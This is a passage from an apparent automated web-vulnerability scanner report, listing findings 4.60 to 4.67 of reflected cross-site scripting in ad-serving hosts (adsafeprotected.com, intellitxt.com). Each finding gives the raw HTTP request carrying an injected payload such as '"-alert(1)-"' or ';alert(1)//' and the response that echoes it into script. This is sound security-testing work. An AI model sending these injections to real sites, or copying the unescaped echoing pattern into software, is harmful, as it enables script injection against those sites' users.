   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
GVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10625/165711/adi/N5282.161249.ADNETIK.COMcacc9"-alert(1)-"5c371b0f231/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3Lmd
...[SNIP]...

4.60. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3069"-alert(1)-"bcb2ac021ed was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283d3069"-alert(1)-"bcb2ac021ed;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7F6EBC3827678CA9C1C278DAD00E99C2; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:22 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
PpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283d3069"-alert(1)-"bcb2ac021ed;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghn
...[SNIP]...

4.61. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb011"-alert(1)-"6b5839ea77b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943?&cb011"-alert(1)-"6b5839ea77b=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A582730ED9D3E7ACA7D653A8A640404F; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:21 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
TM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943?&cb011"-alert(1)-"6b5839ea77b=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt25h32"
};


(function(){var O="3.13.1";var w=(
...[SNIP]...

4.62. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14d92"-alert(1)-"e11a01d09da was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943?14d92"-alert(1)-"e11a01d09da HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=969C7D18C17E6CF125DE65C6192D6639; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:21 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
NTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943?14d92"-alert(1)-"e11a01d09da",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt25h0b"
};


(function(){var O="3.13.1";var w=(ad
...[SNIP]...

4.63. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ba4a"-alert(1)-"51d574e77ee was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D5ba4a"-alert(1)-"51d574e77ee&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F645E89D2DE63B512888E6C0840EEADD; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:21 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
jAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D5ba4a"-alert(1)-"51d574e77ee&redir=;ord=1576327943?",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt25gx4"
};


(function(){v
...[SNIP]...

4.64. http://goal.us.intellitxt.com/al.asp [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://goal.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e6ebd%3balert(1)//7662a95d143 was submitted in the jscallback parameter. This input was echoed as e6ebd;alert(1)//7662a95d143 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20111002235932&cc=us&hk=1&ipid=17560&mh=e4d7a117d40d51c07461e5ec2ec357de&pvm=8a1bde305c8c7fc10d8c64ac123edbc3&pvu=D86A9C320A56454497A101B6CE3CD363&rcc=--&so=0&prf=ll%3A7961%7Cintl%3A15542%7Cadvint%3A15578%7Cadvl%3A15578%7Ctl%3A15579&jscallback=$iTXT.js.callback1e6ebd%3balert(1)//7662a95d143 HTTP/1.1
Host: goal.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=""; Domain=.intellitxt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Mon, 03 Oct 2011 00:02:09 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1e6ebd;alert(1)//7662a95d143();}catch(e){}

4.65. http://goal.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://goal.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf91d'-alert(1)-'82f479773ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=17560&cf91d'-alert(1)-'82f479773ab=1 HTTP/1.1
Host: goal.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=""; Domain=.intellitxt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 11466
Date: Mon, 03 Oct 2011 00:00:59 GMT
Age: 0
Connection: keep-alive

document.itxtDebugOn=0;if('undefined'==typeof $iTXT){$iTXT={};};$iTXT.debug={Log:function()
{},Category:{},error:function()
{},info:function()
{},debug:function()
{},trace:function()
{},Util:{isLoggin
...[SNIP]...
18'};$iTXT.js.gaPageViewTracker='UA-15687529-23';$iTXT.js.verticalId='21';$iTXT.js.serverUrl='http://goal.us.intellitxt.com';$iTXT.js.serverName='goal.us.intellitxt.com';$iTXT.js.pageQuery='ipid=17560&cf91d'-alert(1)-'82f479773ab=1';$iTXT.js.ipid='17560';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();(function(){var e=document.createElement("img");e.src="http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=80000&c
...[SNIP]...

4.66. http://goal.us.intellitxt.com/v4/init [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://goal.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ce85d%3balert(1)//92071f6f8b5 was submitted in the jscallback parameter. This input was echoed as ce85d;alert(1)//92071f6f8b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1317599965157&pagecl=36717&fv=10&muid=&refurl=http%3A%2F%2Fwww.goal.com%2Fen%2Fnews%2F9%2Fengland%2F2011%2F10%2F01%2F2691360%2Fanderson-confident-manchester-united-will-keep-unbeaten-run&ipid=17560&jscallback=$iTXT.js.callback0ce85d%3balert(1)//92071f6f8b5 HTTP/1.1
Host: goal.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 7509
Date: Mon, 03 Oct 2011 00:02:54 GMT
Age: 0
Connection: keep-alive

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
et('initskip',0);$iTXT.data.Context.params.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');try{$iTXT.js.callback0ce85d;alert(1)//92071f6f8b5({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

4.67. http://goal.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://goal.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75336"-alert(1)-"a0600fbcc40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1317599965157&pagecl=36717&fv=10&muid=&refurl=http%3A%2F%2Fwww.goal.com%2Fen%2Fnews%2F9%2Fengland%2F2011%2F10%2F01%2F2691360%2Fanderson-confident-manchester-united-will-keep-unbeaten-run&ipid=17560&jscallback=$iTXT.js.callback0&75336"-alert(1)-"a0600fbcc40=1 HTTP/1.1
Host: goal.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
